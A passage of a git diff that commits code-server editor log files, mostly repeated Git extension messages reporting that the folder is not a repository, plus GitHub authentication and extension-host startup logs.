set). +2026-01-21 23:43:32.613 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:43:32.613 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:43:53.527 [info] > git rev-parse --show-toplevel [4ms] +2026-01-21 23:43:53.527 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:44:00.362 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:44:00.362 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:50:15.440 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:50:15.440 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:50:16.096 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:50:16.096 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:50:17.465 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:50:17.465 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:50:19.176 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:50:19.176 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:50:20.183 [info] > git rev-parse --show-toplevel [3ms] +2026-01-21 23:50:20.183 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:50:28.028 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:50:28.028 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:51:07.610 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:51:07.611 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:51:41.245 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:51:41.245 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:51:48.239 [info] > git rev-parse --show-toplevel [2ms] +2026-01-21 23:51:48.239 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:51:49.198 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:51:49.198 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:51:54.682 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:51:54.683 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-21 23:52:03.731 [info] > git rev-parse --show-toplevel [1ms] +2026-01-21 23:52:03.731 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:26:37.305 [info] > git rev-parse --show-toplevel [3ms] +2026-01-22 00:26:37.305 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:26:46.699 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 00:26:46.699 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:26:47.229 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 00:26:47.229 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:26:48.308 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 00:26:48.308 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:27:01.884 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 00:27:01.884 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:27:02.765 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 00:27:02.765 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:27:05.058 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 00:27:05.058 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:27:13.495 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 00:27:13.496 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:27:49.648 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 00:27:49.648 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:27:56.003 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 00:27:56.003 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:27:56.609 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 00:27:56.609 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:27:57.412 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 00:27:57.412 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:28:26.439 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 00:28:26.439 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:28:32.538 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 00:28:32.538 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:28:33.356 [info] > git rev-parse --show-toplevel [3ms] +2026-01-22 00:28:33.356 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:29:27.617 [info] > git rev-parse --show-toplevel [4ms] +2026-01-22 00:29:27.617 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:30:06.273 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 00:30:06.273 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 00:30:49.361 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 00:30:49.361 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:10:06.023 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:10:06.023 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:10:23.641 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:10:23.641 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:10:25.788 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:10:25.788 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:17:24.507 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:17:24.508 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:17:37.780 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:17:37.781 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:21:19.171 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:21:19.171 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:24:37.299 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:24:37.299 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:24:44.518 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:24:44.518 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:25:31.913 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:25:31.913 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:25:38.563 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:25:38.563 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:25:39.344 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:25:39.344 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:25:40.266 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:25:40.266 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:26:09.350 [info] > git rev-parse --show-toplevel [4ms] +2026-01-22 01:26:09.350 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:26:32.628 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:26:32.628 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:28:08.831 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:28:08.831 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:28:15.156 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:28:15.156 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:28:15.782 [info] > git rev-parse --show-toplevel [3ms] +2026-01-22 01:28:15.782 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:28:17.012 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:28:17.012 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:28:19.001 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:28:19.001 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:32:10.432 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:32:10.432 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:32:13.252 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:32:13.252 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:32:13.863 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:32:13.863 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:32:14.918 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:32:14.918 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:32:16.045 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:32:16.045 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:32:37.614 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:32:37.614 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:33:19.386 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:33:19.386 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:40:22.588 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 01:40:22.588 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:40:55.836 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:40:55.836 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 01:40:56.553 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 01:40:56.553 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 02:00:40.728 [info] > git rev-parse --show-toplevel [4ms] +2026-01-22 02:00:40.728 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 02:02:45.716 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 02:02:45.716 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 02:02:46.292 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 02:02:46.292 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 02:09:03.181 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 02:09:03.181 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T175427/exthost4/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T175427/exthost4/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..dfd5e8a --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost4/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-21 19:20:38.506 [info] Reading sessions from keychain... +2026-01-21 19:20:38.506 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.506 [info] Got 0 sessions for ... +2026-01-21 19:20:38.506 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.506 [info] Got 0 sessions for ... +2026-01-21 19:20:38.506 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.506 [info] Got 0 sessions for ... +2026-01-21 19:20:38.506 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.506 [info] Got 0 sessions for ... +2026-01-21 19:20:38.506 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.506 [info] Got 0 sessions for ... +2026-01-21 19:20:38.506 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.506 [info] Got 0 sessions for ... +2026-01-21 19:20:38.506 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.506 [info] Got 0 sessions for ... +2026-01-21 19:20:38.506 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.506 [info] Got 0 sessions for ... +2026-01-21 19:20:38.506 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.506 [info] Got 0 sessions for ... +2026-01-21 19:20:38.509 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.509 [info] Got 0 sessions for ... +2026-01-21 19:20:38.509 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.509 [info] Got 0 sessions for ... +2026-01-21 19:20:38.509 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.509 [info] Got 0 sessions for ... +2026-01-21 19:20:38.510 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.510 [info] Got 0 sessions for ... +2026-01-21 19:20:38.510 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.510 [info] Got 0 sessions for ... +2026-01-21 19:20:38.510 [info] Getting sessions for all scopes... +2026-01-21 19:20:38.510 [info] Got 0 sessions for ... +2026-01-21 19:20:41.822 [info] Getting sessions for all scopes... +2026-01-21 19:20:41.822 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T175427/exthost4/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T175427/exthost4/vscode.github/GitHub.log new file mode 100755 index 0000000..7298b07 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost4/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-21 19:20:39.205 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T175427/exthost4/vscode.html-language-features/HTML Language Server.log b/code-server-config/data/logs/20260120T175427/exthost4/vscode.html-language-features/HTML Language Server.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T175427/exthost4/vscode.json-language-features/JSON Language Server.log b/code-server-config/data/logs/20260120T175427/exthost4/vscode.json-language-features/JSON Language Server.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T175427/exthost5/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T175427/exthost5/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T175427/exthost5/remoteexthost.log b/code-server-config/data/logs/20260120T175427/exthost5/remoteexthost.log new file mode 100755 index 0000000..d4f59c4 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost5/remoteexthost.log @@ -0,0 +1,15 @@ +2026-01-22 11:53:43.955 [info] Extension host with pid 165828 started +2026-01-22 11:53:43.962 [info] Lock '/config/data/User/workspaceStorage/787b6db1/vscode.lock': Lock acquired. +2026-01-22 11:53:44.067 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-22 11:53:44.068 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-22 11:53:44.183 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-22 11:53:44.218 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-22 11:53:44.218 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-22 11:53:44.357 [info] Eager extensions activated +2026-01-22 11:53:44.358 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-22 11:53:44.358 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-22 12:42:47.480 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-22 12:42:50.557 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-22 14:29:52.354 [info] Extension host terminating: received terminate message from renderer +2026-01-22 14:29:52.356 [info] Lock '/config/data/User/workspaceStorage/787b6db1/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-22 14:29:52.411 [info] Extension host with pid 165828 exiting with code 0 diff --git a/code-server-config/data/logs/20260120T175427/exthost5/vscode.git/Git.log b/code-server-config/data/logs/20260120T175427/exthost5/vscode.git/Git.log new file mode 100755 index 0000000..c8a11d8 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost5/vscode.git/Git.log @@ -0,0 +1,56 @@ +2026-01-22 11:53:44.396 [info] [main] Log level: Info +2026-01-22 11:53:44.396 [info] [main] Validating found git in: "git" +2026-01-22 11:53:44.396 [info] [main] Using git "2.43.0" from "git" +2026-01-22 11:53:44.396 [info] [Model][doInitialScan] Initial repository scan started +2026-01-22 11:53:44.396 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 11:53:44.396 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 11:53:44.396 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 11:53:44.396 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 11:53:44.397 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 11:53:44.397 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 11:53:44.401 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 11:53:44.401 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 11:53:44.428 [info] > git rev-parse --show-toplevel [25ms] +2026-01-22 11:53:44.428 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 11:53:44.436 [info] > git rev-parse --show-toplevel [5ms] +2026-01-22 11:53:44.436 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 11:53:44.441 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 11:53:44.441 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 11:53:44.445 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 11:53:44.445 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 11:53:44.449 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 11:53:44.450 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 11:53:44.453 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-22 11:53:46.165 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 11:53:46.165 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 12:17:40.137 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 12:17:40.137 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 12:42:46.817 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 12:42:46.817 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 12:42:47.730 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 12:42:47.730 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 12:43:12.017 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 12:43:12.017 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 12:43:12.598 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 12:43:12.598 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 12:43:13.414 [info] > git rev-parse --show-toplevel [2ms] +2026-01-22 12:43:13.414 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-22 13:00:05.131 [info] > git rev-parse --show-toplevel [1ms] +2026-01-22 13:00:05.131 [info] fatal: not a git repository (or any parent up to mount point /home/coder) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/code-server-config/data/logs/20260120T175427/exthost5/vscode.github-authentication/GitHub Authentication.log b/code-server-config/data/logs/20260120T175427/exthost5/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..2d3586f --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost5/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-22 11:53:44.285 [info] Reading sessions from keychain... +2026-01-22 11:53:44.285 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.285 [info] Got 0 sessions for ... +2026-01-22 11:53:44.285 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.285 [info] Got 0 sessions for ... +2026-01-22 11:53:44.285 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.285 [info] Got 0 sessions for ... +2026-01-22 11:53:44.285 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.285 [info] Got 0 sessions for ... +2026-01-22 11:53:44.285 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.285 [info] Got 0 sessions for ... +2026-01-22 11:53:44.285 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.285 [info] Got 0 sessions for ... +2026-01-22 11:53:44.285 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.285 [info] Got 0 sessions for ... +2026-01-22 11:53:44.285 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.285 [info] Got 0 sessions for ... +2026-01-22 11:53:44.285 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.285 [info] Got 0 sessions for ... +2026-01-22 11:53:44.286 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.286 [info] Got 0 sessions for ... +2026-01-22 11:53:44.311 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.311 [info] Got 0 sessions for ... +2026-01-22 11:53:44.311 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.311 [info] Got 0 sessions for ... +2026-01-22 11:53:44.311 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.311 [info] Got 0 sessions for ... +2026-01-22 11:53:44.311 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.311 [info] Got 0 sessions for ... +2026-01-22 11:53:44.311 [info] Getting sessions for all scopes... +2026-01-22 11:53:44.311 [info] Got 0 sessions for ... +2026-01-22 11:53:46.160 [info] Getting sessions for all scopes... +2026-01-22 11:53:46.160 [info] Got 0 sessions for ... diff --git a/code-server-config/data/logs/20260120T175427/exthost5/vscode.github/GitHub.log b/code-server-config/data/logs/20260120T175427/exthost5/vscode.github/GitHub.log new file mode 100755 index 0000000..ce6a9d9 --- /dev/null +++ b/code-server-config/data/logs/20260120T175427/exthost5/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-22 11:53:44.440 [info] Log level: Info diff --git a/code-server-config/data/logs/20260120T175427/exthost6/remoteExtHostTelemetry.log b/code-server-config/data/logs/20260120T175427/exthost6/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/data/logs/20260120T175427/exthost6/remoteexthost.log b/code-server-config/data/logs/20260120T175427/exthost6/remoteexthost.log new file mode 100755 index 